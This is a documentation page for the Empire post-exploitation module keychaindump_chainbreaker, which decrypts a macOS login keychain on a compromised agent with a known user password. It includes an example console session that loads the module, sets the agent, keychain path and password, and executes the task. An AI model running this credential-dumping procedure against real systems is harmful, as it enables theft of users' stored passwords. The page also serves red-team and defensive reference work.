Chainbreaker - Empire Module


This page contains detailed information about how to use the python/collection/osx/keychaindump_chainbreaker Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Chainbreaker
Module: python/collection/osx/keychaindump_chainbreaker
Source code: empire/server/modules/python/collection/osx/keychaindump_chainbreaker.yaml
MITRE ATT&CK: T1142
Language: Python
Needs admin: No
OPSEC safe: No
Background: No

A keychain dump module that allows for decryption via known password.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the keychaindump_chainbreaker module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the keychaindump_chainbreaker module:

Agent
Agent to execute module on.

KeyChain
Manual location of keychain to decrypt, otherwise default.
Default value: /Users/USERNAME/Library/Keychains/login.keychain.

Password
Known user password to attempt to decrypt the Keychain.

Keychaindump_chainbreaker Example Usage


Here's an example of how to use the keychaindump_chainbreaker module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/osx/ducky) > usemodule python/collection/osx/keychaindump_chainbreaker

 Author       @n0fate                                                               
              @Killswitch-GUI                                                       
 Background   False                                                                 
 Comments     https://github.com/n0fate/chainbreaker                                
 Description  A keychain dump module that allows for decryption via known password. 
 Language     python                                                                
 Name         python/collection/osx/keychaindump_chainbreaker                       
 NeedsAdmin   False                                                                 
 OpsecSafe    False                                                                 
 Techniques   http://attack.mitre.org/techniques/T1142                              


,Record Options----------------------------------,----------,-----------------------------------,
| Name     | Value                               | Required | Description                       |
|----------|-------------------------------------|----------|-----------------------------------|
| Agent    |                                     | True     | Agent to execute module on.       |
|----------|-------------------------------------|----------|-----------------------------------|
| KeyChain | /Users/USERNAME/Library/Keychains/l | True     | Manual location of keychain to    |
|          | ogin.keychain                       |          | decrypt, otherwise default.       |
|----------|-------------------------------------|----------|-----------------------------------|
| Password |                                     | True     | Known user password to attempt to |
|          |                                     |          | decrypt the Keychain.             |
'----------'-------------------------------------'----------'-----------------------------------'

(Empire: usemodule/python/collection/osx/keychaindump_chainbreaker) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/python/collection/osx/keychaindump_chainbreaker) > set KeyChain /Users/USERNAME/Library/Keychains/login.keychain
[*] Set KeyChain to /Users/USERNAME/Library/Keychains/login.keychain
(Empire: usemodule/python/collection/osx/keychaindump_chainbreaker) > set Password Password123
[*] Set Password to Password123
(Empire: usemodule/python/collection/osx/keychaindump_chainbreaker) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.